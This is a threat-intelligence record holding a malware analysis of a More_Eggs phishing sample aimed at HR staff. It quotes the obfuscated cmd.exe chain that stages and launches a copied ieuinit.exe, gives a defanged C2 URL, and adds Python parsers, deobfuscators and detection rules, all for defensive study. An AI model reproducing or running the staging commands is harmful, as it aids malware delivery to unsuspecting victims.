{
	"id": "f4fa64cd-d32f-449c-9554-bb27b020b6ee",
	"created_at": "2026-04-06T00:14:24.925861Z",
	"updated_at": "2026-04-10T03:36:08.282395Z",
	"deleted_at": null,
	"sha1_hash": "026b032f45e8456ea6c79cd9b5dbadef372f31a5",
	"title": "More_Eggs? A Venom Spider Backdoor Targeting HR",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3079484,
	"plain_text": "More_Eggs? A Venom Spider Backdoor Targeting HR\r\nBy Tonmoy Jitu\r\nPublished: 2025-05-17 · Archived: 2026-04-05 16:18:27 UTC\r\nThe More_Eggs malware, operated by the financially motivated Venom Spider (aka Golden Chickens) group, is a JavaScript backdoor sold as Malware-as-a-Service (MaaS) to threat actors such as FIN6 and Cobalt Group. Known for targeting human resources (HR) departments, it abuses the trust HR staff place in job-application emails to deliver its payload.\r\nThis blog analyzes a recent More_Eggs sample, Sebastian Hall.zip , which contains a decoy image and a malicious Windows shortcut ( LNK ) file. The purpose of this analysis is to:\r\nDe-obfuscate the LNK ’s command line to understand what it does.\r\nAnalyze the ieuinit.inf file for C2 configuration.\r\nLocate the JS file, a hallmark of More_Eggs .\r\nInitial Triage and Sample Overview\r\nThe Sebastian Hall.zip sample, sourced from MalwareBazaar, was confirmed as part of the More_Eggs campaign. The ZIP file includes:\r\nImage File ( b.jpg ): A decoy, there to make the ZIP look like a genuine job application.\r\nLNK File ( Sebastian Hall.lnk ): A Windows shortcut whose target is cmd.exe ; the malicious behaviour lives entirely in the arguments the shortcut passes to it.\r\nFig 01: Content of Sebastian Hall.zip\r\nFig 02: VirusTotal conviction\r\nStatic Analysis: De-obfuscating the LNK\r\nThe LNK file ( Sebastian Hall.lnk ) is the heart of the infection chain. Checking its properties ( right-click \u003e Properties ) showed only the Target field ( C:\\Windows\\System32\\cmd.exe ). Explorer’s Properties dialog truncates long command lines, so the arguments that carry the payload were not visible there.\r\nhttps://denwp.com/more-eggs-venom-spider-phishing-campaign/\r\nPage 1 of 8\n\nFig 03: File properties\r\nExtracting the Full Command with LECmd\r\nLECmd (Eric Zimmerman’s LNK Explorer) is a forensic parser built specifically for Windows LNK files. 
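Before reaching for a tool it helps to know where the hidden arguments actually sit in the file: the LNK format stores them as a length-prefixed StringData item after the header, the optional LinkTargetIDList and the optional LinkInfo block, which is exactly the data the Properties dialog cuts off. The following parser is an added example of mine, not code from the original post: it walks those structures, returns the arguments, and applies a few triage checks. The .lnk it parses is a synthetic one built by build_lnk , and SAMPLE_ARGS is a shortened stand-in for the real command line, so the exact bytes, lengths and paths are assumptions.

```python
import struct

# LinkFlags bits from the MS-SHLLINK specification (ShellLinkHeader.LinkFlags)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex('0114020000000000c000000000000046')
# Explorer's Properties dialog shows target + arguments in one text box that is
# commonly documented as capped at 260 characters; anything beyond is invisible.
EXPLORER_TARGET_LIMIT = 260


def _read_string_data(buf, offset, unicode):
    # StringData item: uint16 CountCharacters, then the characters (no terminator).
    (count,) = struct.unpack_from('<H', buf, offset)
    offset += 2
    size = count * 2 if unicode else count
    raw = buf[offset:offset + size]
    text = raw.decode('utf-16-le') if unicode else raw.decode('cp1252')
    return text, offset + size


def parse_lnk(buf):
    """Walk a .lnk file and return its StringData fields (arguments included)."""
    if len(buf) < HEADER_SIZE or struct.unpack_from('<I', buf, 0)[0] != HEADER_SIZE:
        raise ValueError('bad ShellLinkHeader size')
    if buf[4:20] != LINK_CLSID:
        raise ValueError('bad LinkCLSID')
    (flags,) = struct.unpack_from('<I', buf, 20)
    unicode = bool(flags & IS_UNICODE)
    offset = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (uint16) + IDList
        (id_list_size,) = struct.unpack_from('<H', buf, offset)
        offset += 2 + id_list_size
    if flags & HAS_LINK_INFO:                    # LinkInfoSize (uint32) includes itself
        (link_info_size,) = struct.unpack_from('<I', buf, offset)
        offset += link_info_size
    fields = {'flags': flags}
    for bit, name in ((HAS_NAME, 'name'), (HAS_RELATIVE_PATH, 'relative_path'),
                      (HAS_WORKING_DIR, 'working_dir'), (HAS_ARGUMENTS, 'arguments'),
                      (HAS_ICON_LOCATION, 'icon_location')):
        if flags & bit:
            fields[name], offset = _read_string_data(buf, offset, unicode)
    return fields


def hidden_by_explorer(fields):
    """True when the arguments alone already exceed what the Properties dialog shows."""
    return len(fields.get('arguments', '')) > EXPLORER_TARGET_LIMIT


def suspicious_indicators(fields):
    """Cheap triage on the arguments string; returns the reasons that fired."""
    args = fields.get('arguments', '')
    low = args.lower()
    hits = []
    if hidden_by_explorer(fields):
        hits.append('arguments exceed what the Properties dialog displays')
    if '/v' in low.split():
        hits.append('cmd /v enables delayed expansion, needed for !var! obfuscation')
    if args.count('!') >= 2:
        hits.append('contains !var! delayed-expansion references')
    if '%temp%' in low:
        hits.append('stages files in %temp%')
    if 'ieuinit' in low:
        hits.append('references ieuinit.exe')
    return hits


def build_lnk(arguments, relative_path, working_dir):
    """Assemble a minimal Unicode .lnk. Constructed test data, not the real sample."""
    flags = (HAS_LINK_TARGET_ID_LIST | HAS_LINK_INFO | HAS_RELATIVE_PATH
             | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE)
    header = (struct.pack('<I', HEADER_SIZE) + LINK_CLSID + struct.pack('<I', flags)
              + bytes(HEADER_SIZE - 24))              # remaining header fields zeroed
    id_list = struct.pack('<H', 2) + bytes(2)         # IDList holding only the TerminalID
    link_info = struct.pack('<I', 28) + bytes(24)     # dummy LinkInfo, skipped by its size
    body = b''
    for s in (relative_path, working_dir, arguments):
        body += struct.pack('<H', len(s)) + s.encode('utf-16-le')
    return header + id_list + link_info + body


# Shortened stand-in for the sample's command line (constructed; the real one is longer).
SAMPLE_ARGS = ('/v /c start "" "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" & '
               '(for %f in ("peric=s" "tartarly=e" "unvoyagingu=al") do @set %~f) & '
               '!peric!et "jugs=e" & c!unvoyagingu!l s!tartarly!t "colberte=c" & '
               'xcopy /Y /C /Q %windir%\\system32\\ieuinit.exe "%temp%" & '
               'start "" %temp%\\ieuinit.exe -basjestings')

if __name__ == '__main__':
    blob = build_lnk(SAMPLE_ARGS, '..\\..\\..\\Windows\\System32\\cmd.exe', 'C:\\Windows\\System32')
    parsed = parse_lnk(blob)
    print('target :', parsed['relative_path'])
    print('args   :', parsed['arguments'])
    for reason in suspicious_indicators(parsed):
        print('flag   :', reason)
```

Feed parse_lnk the bytes of a real shortcut to get the full arguments regardless of their length; the triage rules are deliberately simple string checks, so treat them as a first filter, not a verdict.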
You can use LECmd to extract the complete command-line arguments with the command below:\r\nLECmd.exe -f \"Sebastian Hall.lnk\"\r\nFig 04: LECmd output\r\nLECmd prints every component of the LNK file, including the machine ID, MAC address and volume information from the TrackerDataBlock, data that many other tools skip, and it can surface overwritten target paths that still survive in the file structure.\r\nExtracting the Full Command with Exiftool\r\nExifTool also parses LNK files and reports the arguments under its CommandLineArguments tag. Quote the path, since the file name contains a space:\r\nexiftool \".\\Sebastian Hall.lnk\"\r\nFig 06: Exiftool output\r\nCommand de-obfuscation\r\nThe extracted command line is heavily obfuscated batch code. The obfuscation turns plain commands ( echo , xcopy , start ) into unreadable forms through variable fragmentation, redundant code and syntactic tricks, a pattern common to More_Eggs LNK payloads.\r\n/v /c start \"\" \"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE\" \u0026 (for %f in (\"peric=s\" \"tartarly=e\" \"unvoya\r\nFig 07: Obfuscated hidden command\r\nBreaking down the obfuscation techniques\r\n1. The script starts Microsoft Word as a decoy so the victim believes a document has opened:\r\nstart \"\" \"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE\"\r\n2. Note the /v switch passed to cmd.exe : it enables delayed environment-variable expansion, which is what makes the !name! references below work. A for loop defines the fragments ( %~f strips the quotes, so each token becomes a set name=value ): peric -\u003e s , tartarly -\u003e e , unvoyagingu -\u003e al . The fragments are then stitched into commands:\r\n(for %f in (\"peric=s\" \"tartarly=e\" \"unvoyagingu=al\") do @set %~f)\r\n!peric!et \" jugs=e\" → set \" jugs=e\"\r\nc!unvoyagingu!l s!tartarly!t \" colberte=c\" → call set \" colberte=c\"\r\n3. Constructs and writes an .inf file ( %temp%\\ieuinit.inf ) with encoded data, one echoed token per line:\r\n(for %o in (\"[version]\" ...) do @echo %~o) \u003e \"%temp%\\ieuinit.inf\"\r\n4. Copies a native system binary, ieuinit.exe , and executes the copy with the attacker’s parameter:\r\nxcopy /Y /C /Q %windir%\\system32\\ieuinit.exe \"%temp%\"\r\nstart \"\" %temp%\\ieuinit.exe -basjestings\r\nIn short, the batch script assembles its payload through obfuscated variable assignments, a hallmark of More_Eggs (Malpedia). The .inf file holds encoded strings, possibly a Base64 payload or configuration. 
The copied ieuinit.exe then triggers the next stage, such as downloading a JScript file or a DLL.\r\nFig 08: De-obfuscated code\r\nExecution Flow Analysis\r\nThe de-obfuscated chain leans on two environment variables, %temp% (the user’s temporary directory) and %windir% (the Windows installation folder). Expressed as PowerShell variables, the paths it works with are:\r\n$wordPath = \"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE\"\r\n$tempFile = \"$env:TEMP\\ieuinit.inf\"\r\n$ieuinitExeSource = \"$env:WINDIR\\system32\\ieuinit.exe\"\r\n$ieuinitExeDest = \"$env:TEMP\\ieuinit.exe\"\r\nNext, the script builds fragments of commands, file names and URLs, stored in variables with bizarre names such as geoscientis or wagonwayma .\r\nThe script writes a file called ieuinit.inf to the %temp% directory, shaped to pass as a legitimate Windows INF file. It has the sections you’d expect, such as [version] or [strings] , but they are packed with malicious data, including a URL and encoded strings. This file is the malware’s instruction manual, disguised as a configuration file.\r\nThe script then copies ieuinit.exe from %windir%\\system32 to %temp% . Because the binary is a genuine Windows component sourced from a trusted directory, the copy itself draws little attention. The copy uses xcopy with /Y (overwrite without prompting), /C (continue even on errors) and /Q (quiet), so it is quick and silent.\r\nFinally, the script runs %temp%\\ieuinit.exe with an argument like -basjestings . 
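The four steps above (decoy Word, INF write, xcopy of ieuinit.exe, launch from %temp%) leave a distinctive process tree, which is the most robust thing to hunt on because it survives changes to the variable names and the URL. The detection logic below is an added example of mine, not part of the original post: three rules run over a handful of constructed Sysmon-style process-creation events (fields pid, ppid, image, cmdline). The PIDs, the hr user profile path and the shortened command line are invented, and two benign look-alikes are included to show what must not fire.

```python
import ntpath
from collections import defaultdict

SYSTEM32 = r'c:\windows\system32'
DECOYS = {'winword.exe', 'wordpad.exe'}


def _base(image):
    return ntpath.basename(image).lower()


def ieuinit_outside_system32(ev):
    """ieuinit.exe is a Windows component; a copy running from anywhere else is the LOLBAS abuse."""
    return _base(ev['image']) == 'ieuinit.exe' and ntpath.dirname(ev['image']).lower() != SYSTEM32


def staging_cmdline(ev):
    """cmd /v one-liner that references ieuinit and uses !var! fragments or xcopy."""
    cl = ev['cmdline'].lower()
    return (_base(ev['image']) == 'cmd.exe' and '/v' in cl.split()
            and 'ieuinit' in cl and ('!' in cl or 'xcopy' in cl))


def decoy_plus_lolbin(children):
    """The LNK's cmd.exe spawns an Office decoy and ieuinit.exe as siblings."""
    names = {_base(c['image']) for c in children}
    return bool(names & DECOYS) and 'ieuinit.exe' in names


def hunt(events):
    """Return (pid, reason) pairs for events matching the More_Eggs LNK chain."""
    by_parent = defaultdict(list)
    for ev in events:
        by_parent[ev['ppid']].append(ev)
    hits = []
    for ev in events:
        if ieuinit_outside_system32(ev):
            hits.append((ev['pid'], 'ieuinit.exe executed outside System32'))
        if staging_cmdline(ev):
            hits.append((ev['pid'], 'cmd.exe /v one-liner staging ieuinit.exe'))
        if _base(ev['image']) == 'cmd.exe' and decoy_plus_lolbin(by_parent[ev['pid']]):
            hits.append((ev['pid'], 'cmd.exe spawned an Office decoy alongside ieuinit.exe'))
    return hits


TEMP = r'C:\Users\hr\AppData\Local\Temp'
OFFICE = r'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
# Shortened stand-in for the LNK's command line (constructed).
LNK_CMDLINE = (r'"C:\Windows\System32\cmd.exe" /v /c start "" "' + OFFICE + r'" & '
               r'(for %f in ("peric=s" "tartarly=e" "unvoyagingu=al") do @set %~f) & '
               r'!peric!et "jugs=e" & xcopy /Y /C /Q %windir%\system32\ieuinit.exe "%temp%" & '
               r'start "" %temp%\ieuinit.exe -basjestings')

# Constructed Sysmon-style process-creation events: PIDs, user and paths are invented.
SAMPLE_EVENTS = [
    {'pid': 100, 'ppid': 50, 'image': r'C:\Windows\System32\cmd.exe', 'cmdline': LNK_CMDLINE},
    {'pid': 101, 'ppid': 100, 'image': OFFICE, 'cmdline': '"' + OFFICE + '"'},
    {'pid': 102, 'ppid': 100, 'image': r'C:\Windows\System32\xcopy.exe',
     'cmdline': r'xcopy /Y /C /Q C:\Windows\system32\ieuinit.exe ' + TEMP},
    {'pid': 103, 'ppid': 100, 'image': TEMP + r'\ieuinit.exe',
     'cmdline': TEMP + r'\ieuinit.exe -basjestings'},
    # benign look-alikes: Word opened by the user, ieuinit.exe run from its real home
    {'pid': 200, 'ppid': 50, 'image': OFFICE, 'cmdline': '"' + OFFICE + '" resume.docx'},
    {'pid': 201, 'ppid': 60, 'image': r'C:\Windows\System32\ieuinit.exe', 'cmdline': 'ieuinit.exe'},
]

if __name__ == '__main__':
    for pid, reason in hunt(SAMPLE_EVENTS):
        print(pid, reason)
```

The sibling rule is the one worth keeping even if the actor swaps the LOLBAS binary: a cmd.exe launched from a shortcut that fans out into an Office application plus an executable in a user-writable directory is rare in normal HR workflows.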
Launching the copied ieuinit.exe is the moment the malware goes live: it can execute JavaScript (JS), load a malicious DLL, or reach out to a C2 server for further instructions. The argument looks random, but it is most likely what steers the binary down the malicious path.\r\n# Clear text commands\r\n# Start Microsoft Word\r\nStart-Process -FilePath $wordPath -ErrorAction Stop\r\n# Write content to ieuinit.inf ($infContent holds the INF text; its contents are not reproduced here)\r\n$infContent | Out-File -FilePath $tempFile -Encoding ASCII -ErrorAction Stop\r\n# Copy ieuinit.exe to temp directory\r\nCopy-Item -Path $ieuinitExeSource -Destination $ieuinitExeDest -Force -ErrorAction Stop\r\n# Start ieuinit.exe with arguments\r\nStart-Process -FilePath $ieuinitExeDest -ArgumentList \"-basjestings\" -ErrorAction Stop\r\nTo keep the victim distracted while all this happens, the script launches Microsoft Word from C:\\Program Files\\Microsoft Office\\root\\Office16 .\r\nFig 09: Attack chain\r\nAnalyzing ieuinit.inf configuration file\r\nThe ieuinit.inf file mimics a Windows INF file, complete with a [version] section. In reality it is a playbook for ieuinit.exe , packed with encoded data.\r\nOne string, dikeriain_CB2CEC , is likely a Base64 or custom-encoded tag, possibly a payload ID or decryption key. Another, a mess of variables like j%cinem%d%tra%l... , decodes to a URL ( hxxp[://]wfshtl[.]com/abf2iawq ). A third, i%acystiaco%u... , becomes the file name ieuinit.inf .\r\nThe strings are split across randomly named variables so that no URL or command appears contiguously for a signature to match. 
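Both layers of the sample use the same trick, variable fragments glued back together at runtime: the batch stage (step 2 above) via !name! delayed expansion and call set , and the INF stage via %name% tokens. The resolver below is an added example of mine, not the author’s tooling, and it serves both passages: deobfuscate_batch replays the for/set definitions and substitutes the references statically, captures what an echo loop writes to a file, and resolve_inf then substitutes the %key% tokens of that file. It assumes the INF tokens follow the standard INF [Strings] semantics, which the post does not state. SAMPLE_SCRIPT is constructed from the fragments quoted above; the [Run] section, the cinem / tra values and the example.test URL are invented, and the real INF and URL are not reproduced.

```python
import re

# (for %x in ("a=b" ...) do @set %~x): bulk variable definition, %~x strips the quotes
FOR_SET_RE = re.compile(r'\(for %(\w+) in \((.*?)\) do @set %~\1\)', re.IGNORECASE)
# (for %x in ("line" ...) do @echo %~x) > file: writes one line per token
FOR_ECHO_RE = re.compile(r'\(for %(\w+) in \((.*?)\) do @echo %~\1\)', re.IGNORECASE)
REDIRECT_RE = re.compile(r'>\s*"?([^"\s]+)"?')
QUOTED_TOKEN_RE = re.compile(r'"([^"]*)"')
# set "name=value" / set name=value, optionally behind call
SET_RE = re.compile(r'^(?:call\s+)?set\s+"?([^"=]+)=([^"]*)"?\s*$', re.IGNORECASE)
# !name! (delayed expansion, hence cmd /v) and %name% (parse-time expansion)
REF_RE = re.compile(r'(!|%)([^!%\s]+)\1')
# %key% inside an INF body, resolved from the [Strings] section
INF_REF_RE = re.compile(r'%([^%\s]+)%')


def expand(text, env, max_rounds=16):
    """Replace !x! and %x% with known values until nothing changes; unknown refs stay."""
    for _ in range(max_rounds):
        new = REF_RE.sub(lambda m: env.get(m.group(2), m.group(0)), text)
        if new == text:
            break
        text = new
    return text


def deobfuscate_batch(script):
    """Statically resolve the variable-fragment obfuscation of a More_Eggs-style one-liner.

    Returns (clear_lines, env, files): the rewritten lines, the variables defined,
    and the content of every file written through an echo loop. This is a static
    aid, not a cmd emulator: %~ modifiers and call's second expansion pass are not modelled.
    """
    env, clear, files = {}, [], {}
    for raw in script.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = FOR_SET_RE.search(line)
        if m:
            for name, _, value in (t.partition('=') for t in QUOTED_TOKEN_RE.findall(m.group(2))):
                env[name] = value
                clear.append(f'set "{name}={value}"')
            continue
        m = FOR_ECHO_RE.search(line)
        if m:
            target = REDIRECT_RE.search(line)
            target = expand(target.group(1), env) if target else '<stdout>'
            files[target] = [expand(t, env) for t in QUOTED_TOKEN_RE.findall(m.group(2))]
            clear.append(f'write {len(files[target])} lines to {target}')
            continue
        line = expand(line, env)
        s = SET_RE.match(line)
        if s:                      # a set statement that was itself assembled from fragments
            env[s.group(1)] = s.group(2)
        clear.append(line)
    return clear, env, files


def resolve_inf(text):
    """Parse an INF body and substitute %key% tokens from its [Strings] section."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(';'):
            continue
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1]
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    strings = {}
    for name, lines in sections.items():
        if name.lower() == 'strings':
            for line in lines:
                key, sep, value = line.partition('=')
                if sep:
                    strings[key.strip().lower()] = value.strip().strip('"')
    return {name: [INF_REF_RE.sub(lambda m: strings.get(m.group(1).lower(), m.group(0)), ln)
                   for ln in lines]
            for name, lines in sections.items() if name.lower() != 'strings'}


# Constructed script modelled on the fragments quoted above; [Run], cinem, tra and the URL are invented.
SAMPLE_SCRIPT = r'''
(for %f in ("peric=s" "tartarly=e" "unvoyagingu=al") do @set %~f)
!peric!et "jugs=e"
c!unvoyagingu!l s!tartarly!t "colberte=c"
(for %o in ("[version]" "signature=$chicago$" "[Strings]" "cinem=tp://exam" "tra=ple.test/pa" "[Run]" "url=ht%cinem%%tra%th") do @echo %~o) > "%temp%\ieuinit.inf"
start "" %temp%\ieuinit.exe -basjestings
'''

if __name__ == '__main__':
    clear, env, files = deobfuscate_batch(SAMPLE_SCRIPT)
    print('\n'.join(clear))
    for path, lines in files.items():
        print(path, resolve_inf('\n'.join(lines)))
```

Two behaviours matter for real samples: a reference whose variable is never defined ( %temp% , %windir% ) is left untouched rather than blanked, which is also what cmd does on a command line as opposed to inside a .bat file, and cmd keeps leading whitespace in variable names ( set " jugs=e" defines a variable called " jugs" ), so the resolver does not trim names either.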
By hiding URLs and commands behind such variable names, More_Eggs keeps its C2 communication and payload delivery out of reach of string-based scanning.\r\nA legitimate Windows binary, ieuinit.exe , is abused by More_Eggs to execute malicious tasks without raising alarms. Normally ieuinit.exe is Internet Explorer’s per-user initialization utility; here it is copied from %windir%\\system32 to %temp% and run with an argument like -basjestings . The argument likely tells it to parse ieuinit.inf , fetching the URL or executing a payload such as JScript or a DLL.\r\nFig 10: ieuinit.inf configuration\r\nJavaScript (JS) backdoor\r\nieuinit.exe then downloads a JavaScript (JS) file from that URL. Magika confirms the file is indeed JavaScript.\r\nFig 11: Magika output\r\nThe heavy obfuscation, packed with random variable names and encoded strings, mirrors the tactics described by Arctic Wolf Labs, where Venom Spider uses server-side polymorphism to generate a unique JS payload per victim, dodging hash- and signature-based antivirus detection.\r\nFig 12: Obfuscated JS Code\r\nScrolling further down, we find a decryptor and the More_Eggs dropper.\r\nFig 13: Obfuscated JS Code\r\nThis dropper, as Arctic Wolf notes, generates a JS launcher and payload, ultimately deploying the More_Eggs backdoor, a modular payload that collects system information and contacts C2 servers. The sample’s behaviour aligns with this, likely fetching a DLL and additional scripts to deepen the infection.\r\nDigging into the JS file proved tricky because of its anti-debugging features; for a deeper look at the More_Eggs_Dropper , see Arctic Wolf’s analysis.\r\nThe below artifacts can be used to hunt for More_Eggs :\r\nWatch for unexpected launches of Microsoft Word or WordPad, often triggered by LNK files to distract users while the payload runs. 
Check process trees for cmd.exe spawning these apps alongside suspicious binaries ( ieuinit.exe ).\r\nMonitor ieuinit.exe executions from %temp% rather than %windir%\\system32 . More_Eggs uses this LOLBAS binary with arguments like -basjestings to parse ieuinit.inf .\r\nSearch %temp% for ieuinit.inf and ieuinit.exe , and remove them.\r\nFlag LNK files within ZIP attachments. More_Eggs attacks commonly involve ZIP files that contain both a malicious LNK file and a decoy JPG image.\r\nIOC\r\nSHA256\r\n4e18f606f7a31ffbea632ceaffad77689f810a3cde26d2a913d4530eaae5c5d1\r\n46f587b4375bb3295a5361ee0a0ee0da3b91173852d8aa4c156d0706f55536ee\r\n499815559568ab0684e6f6b68180347da32faf76258da3e5e2d7c6839c9b1020\r\nURL: hxxp[://]wfshtl[.]com/abf2iawq\r\nAdditional More_Eggs IOCs can be found in my git repository.\r\nReference:\r\nArctic Wolf Labs: Venom Spider Uses Server-Side Polymorphism to Weave a Web Around Victims. Arctic Wolf Labs discovered a new campaign targeting corporate HR departments with fake resumes that drop a malicious backdoor called More_eggs onto their devices.\r\nTrend Micro: MDR in Action: Preventing The More_eggs Backdoor From Hatching.\r\nSource: https://denwp.com/more-eggs-venom-spider-phishing-campaign/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://denwp.com/more-eggs-venom-spider-phishing-campaign/"
	],
	"report_names": [
		"more-eggs-venom-spider-phishing-campaign"
	],
	"threat_actors": [
		{
			"id": "12517c87-040a-4627-a3df-86ca95e5c13f",
			"created_at": "2022-10-25T16:07:23.61665Z",
			"updated_at": "2026-04-10T02:00:04.689Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"ATK 88",
				"Camouflage Tempest",
				"FIN6",
				"G0037",
				"Gold Franklin",
				"ITG08",
				"Skeleton Spider",
				"Storm-0538",
				"TAAL",
				"TAG-CR2",
				"White Giant"
			],
			"source_name": "ETDA:FIN6",
			"tools": [
				"AbaddonPOS",
				"Agentemis",
				"AmmyyRAT",
				"Anchor_DNS",
				"BlackPOS",
				"CmdSQL",
				"Cobalt Strike",
				"CobaltStrike",
				"FlawedAmmyy",
				"FrameworkPOS",
				"Grateful POS",
				"JSPSPY",
				"Kaptoxa",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LockerGoga",
				"MMon",
				"Magecart",
				"Meterpreter",
				"Mimikatz",
				"More_eggs",
				"NeverQuest",
				"POSWDS",
				"Reedum",
				"Ryuk",
				"SCRAPMINT",
				"SONE",
				"SpicyOmelette",
				"StealerOne",
				"Taurus Loader Stealer Module",
				"Terra Loader",
				"TerraStealer",
				"Vawtrak",
				"WCE",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"cobeacon",
				"grabnew"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f5c90ccc-0f18-4e07-a246-b62101ab2f6f",
			"created_at": "2023-01-06T13:46:38.854407Z",
			"updated_at": "2026-04-10T02:00:03.122844Z",
			"deleted_at": null,
			"main_name": "GC02",
			"aliases": [
				"Golden Chickens",
				"Golden Chickens02",
				"Golden Chickens 02"
			],
			"source_name": "MISPGALAXY:GC02",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f2fa9952-301f-4376-ac69-743d6f2bec1e",
			"created_at": "2023-01-06T13:46:39.122721Z",
			"updated_at": "2026-04-10T02:00:03.22231Z",
			"deleted_at": null,
			"main_name": "VENOM SPIDER",
			"aliases": [
				"badbullz",
				"badbullzvenom"
			],
			"source_name": "MISPGALAXY:VENOM SPIDER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ea7bfe06-7c23-481d-b8ba-eafa6cda3bc9",
			"created_at": "2022-10-25T15:50:23.317961Z",
			"updated_at": "2026-04-10T02:00:05.280403Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"FIN6",
				"Magecart Group 6",
				"ITG08",
				"Skeleton Spider",
				"TAAL",
				"Camouflage Tempest"
			],
			"source_name": "MITRE:FIN6",
			"tools": [
				"FlawedAmmyy",
				"GrimAgent",
				"FrameworkPOS",
				"More_eggs",
				"Cobalt Strike",
				"Windows Credential Editor",
				"AdFind",
				"PsExec",
				"LockerGoga",
				"Ryuk",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b3acfb48-b04d-4d3d-88a8-836d7376fa2e",
			"created_at": "2024-06-19T02:03:08.052814Z",
			"updated_at": "2026-04-10T02:00:03.659971Z",
			"deleted_at": null,
			"main_name": "GOLD FRANKLIN",
			"aliases": [
				"FIN6 ",
				"ITG08 ",
				"MageCart Group 6 ",
				"Skeleton Spider ",
				"Storm-0538 ",
				"White Giant "
			],
			"source_name": "Secureworks:GOLD FRANKLIN",
			"tools": [
				"FrameWorkPOS",
				"Metasploit",
				"Meterpreter",
				"Mimikatz",
				"PowerSploit",
				"PowerUpSQL",
				"RemCom"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "88802a4b-5b3d-42ee-99e6-8a4f5fd231f6",
			"created_at": "2023-01-06T13:46:38.851345Z",
			"updated_at": "2026-04-10T02:00:03.121861Z",
			"deleted_at": null,
			"main_name": "GC01",
			"aliases": [
				"Golden Chickens",
				"Golden Chickens01",
				"Golden Chickens 01"
			],
			"source_name": "MISPGALAXY:GC01",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2dfaa730-7079-494c-b2f0-3ff8f3598a51",
			"created_at": "2022-10-25T16:07:23.474746Z",
			"updated_at": "2026-04-10T02:00:04.623746Z",
			"deleted_at": null,
			"main_name": "Cobalt Group",
			"aliases": [
				"ATK 67",
				"Cobalt Gang",
				"Cobalt Spider",
				"G0080",
				"Gold Kingswood",
				"Mule Libra",
				"TAG-CR3"
			],
			"source_name": "ETDA:Cobalt Group",
			"tools": [
				"ATMRipper",
				"ATMSpitter",
				"Agentemis",
				"AmmyyRAT",
				"AtNow",
				"COOLPANTS",
				"CobInt",
				"Cobalt Strike",
				"CobaltStrike",
				"Cyst Downloader",
				"Fareit",
				"FlawedAmmyy",
				"Formbook",
				"Little Pig",
				"Metasploit Stager",
				"Mimikatz",
				"More_eggs",
				"NSIS",
				"Nullsoft Scriptable Install System",
				"Pony Loader",
				"Ripper ATM",
				"SDelete",
				"Siplog",
				"SoftPerfect Network Scanner",
				"SpicyOmelette",
				"Taurus Builder",
				"Taurus Builder Kit",
				"Taurus Loader",
				"Terra Loader",
				"ThreatKit",
				"VenomKit",
				"cobeacon",
				"win.xloader"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "ee3363a4-e807-4f95-97d8-b603c31b9de1",
			"created_at": "2023-01-06T13:46:38.485884Z",
			"updated_at": "2026-04-10T02:00:02.99385Z",
			"deleted_at": null,
			"main_name": "FIN6",
			"aliases": [
				"SKELETON SPIDER",
				"ITG08",
				"MageCart Group 6",
				"ATK88",
				"TA4557",
				"Storm-0538",
				"White Giant",
				"GOLD FRANKLIN",
				"G0037",
				"Camouflage Tempest"
			],
			"source_name": "MISPGALAXY:FIN6",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c11abba0-f5e8-4017-a4ee-acb1a7c8c242",
			"created_at": "2022-10-25T15:50:23.744036Z",
			"updated_at": "2026-04-10T02:00:05.294413Z",
			"deleted_at": null,
			"main_name": "Cobalt Group",
			"aliases": [
				"Cobalt Group",
				"GOLD KINGSWOOD",
				"Cobalt Gang",
				"Cobalt Spider"
			],
			"source_name": "MITRE:Cobalt Group",
			"tools": [
				"Mimikatz",
				"More_eggs",
				"SpicyOmelette",
				"SDelete",
				"Cobalt Strike",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "7a257844-df90-4bd4-b0f1-77d00ff82802",
			"created_at": "2022-10-25T16:07:24.376356Z",
			"updated_at": "2026-04-10T02:00:04.964565Z",
			"deleted_at": null,
			"main_name": "Venom Spider",
			"aliases": [
				"Golden Chickens",
				"TA4557",
				"Venom Spider"
			],
